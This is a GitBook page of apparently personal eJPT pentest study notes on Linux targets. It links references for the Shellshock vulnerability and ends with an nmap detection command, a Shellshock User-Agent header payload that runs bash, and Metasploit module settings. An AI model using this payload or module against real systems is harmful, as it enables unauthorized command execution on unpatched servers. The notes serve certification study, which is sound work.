πŸ“¨
Notes
search
Ctrlk
  • πŸ‘‹About me.
  • 🚩CTF writeups
    • 2022 CTFschevron-right
    • 2023 CTFschevron-right
    • 2024 CTFschevron-right
    • 2025 CTFschevron-right
  • πŸ“¦Rooms
    • HackTheBoxchevron-right
    • Tryhackmechevron-right
  • APK pentesting
    • ADB Cheatsheet
    • Tools & Get Started
    • Pull & Patch
    • Static analysischevron-right
    • Dynamic Analysischevron-right
  • Web Security
    • File Upload Bypass
    • To remember LoG
    • SSTI
    • Eval bypass
    • HTTP Headerschevron-right
  • Active Directory
    • πŸ–₯️what is? General info
    • LLMNR poisoning
    • Attack list for pentest
  • πŸŽ‘Overview (fundamentals/cheatsheet)chevron-right
  • πŸ†Certifications
    • EJPT v2chevron-right
      • Assesment Methodologychevron-right
      • Host & Network Pentestchevron-right
        • Linuxchevron-right
          • Checklist (priv esc)
        • Windowschevron-right
      • Web app pentest
      • Host & Network pentest (MSF)
      • Post exploitationchevron-right
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
  1. πŸ†Certificationschevron-right
  2. EJPT v2chevron-right
  3. Host & Network Pentest

Linux

hashtag
Shellshock vulnerability

https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdfowasp.orgchevron-right
PPT by owasp
LogoInside Shellshock: How hackers are using it to exploit systemsThe Cloudflare Blogchevron-right
walkthrough of the vuln

hashtag
PoC

https://github.com/opsxcq/exploit-CVE-2014-6271arrow-up-right

hashtag
nmap scan

hashtag
exploitation

hashtag
metasploit

hashtag
FTP

  • for FTP you can refer to:

FTPchevron-right

hashtag
SSH

  • refer this page for ssh:

SSHchevron-right

hashtag
Samba

  • for samba refer:

Samba (SMB)chevron-right

PreviousHost & Network Pentestchevron-leftNextChecklist (priv esc)chevron-right

Last updated 2 years ago

  • Shellshock vulnerability
  • PoC
  • nmap scan
  • exploitation
  • metasploit
  • FTP
  • SSH
  • Samba
nmap $IP --script=http-shellshock --script-args "http-shellshock.url=/path/file.cgi
User Agent: () { :; }; echo; echo; /bin/bash -c 'type your cmd here'
use exploit/multi/http/apache_mod_cgi_bash_env_exec

#options:
set RHOSTS $IP
set TARGETURL /path/to/file.cgi
exploit